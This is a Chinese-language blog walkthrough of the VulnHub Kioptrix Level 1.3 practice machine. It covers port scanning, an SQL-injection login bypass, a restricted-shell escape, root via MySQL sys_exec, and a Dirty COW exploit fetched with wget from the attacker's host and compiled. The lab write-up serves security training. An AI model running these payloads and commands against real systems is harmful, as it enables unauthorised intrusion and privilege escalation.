zoukankan      html  css  js  c++  java
  • PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1.3

    猫宁~~~

    地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

    打开vmwareworkstation---创建新的虚拟机---稍后安装操作系统---操作系统和版本都是其他---完成---编辑虚拟机设置---删除原有硬盘,添加新硬盘---使用现有虚拟硬盘---选择Kioptrix4_vmware.vmdk---网络模式为桥接

    kali linux IP 192.168.100.6

    nmap 192.168.100.0/24

    发现靶机的IP 192.168.100.19

    nmap -sV -p1-65535 192.168.100.19

    22/tcp  open  ssh         

    OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

    80/tcp  open  http        

    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

    139/tcp open  netbios-ssn 

    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

    445/tcp open  netbios-ssn 

    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    访问http://192.168.100.19/,有登录框

    访问http://192.168.100.19/john/,可以跳转登录框,用户名john

    nikto -h 192.168.100.19

    john,'or '1'='1,成功登录,显示控制面板帐户密码john,MyNameIsJohn

    python -c 'import pty;pty.spawn("/bin/bash")'

    被禁止使用

    echo os.system("/bin/bash")

    成功进入正常交互界面

    john@Kioptrix4

    cd /var/www

    cat checklogin.php

    发现数据库用户名密码为空

    mysql -uroot -p

    select sys_exec("usermod -aG admin john");

    exit

    sudo su root,输入密码MyNameIsJohn

    成为root帐户

    脏牛提权思路

    uname -a 

    Linux Kioptrix4 2.6.24-24-server

    searchsploit dirty

    https://www.exploit-db.com/exploits/40839

    40839.c

    cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/

    python -m SimpleHTTPServer 6666

    cd /tmp

    wget http://192.168.100.6:6666/40839.c

    Linux Kernel 2.6.22<3.9 

    gcc -pthread 40839.c -o muma -lcryp

    ./muma

    可惜缺少,gcc,pentium-builder

  • 相关阅读:
    SharePoint网站迁移问题
    使用.NET框架自带的Json序列化类
    IL:Hello World
    Javascript面向对象
    抽象代数学习记录
    关于集成测试
    用QTP脚本操作腾讯QQ好友买卖功能
    关于白盒测试一些资料
    Developer小记
    架构设计
  • 原文地址:https://www.cnblogs.com/landesk/p/13630170.html
Copyright © 2011-2022 走看看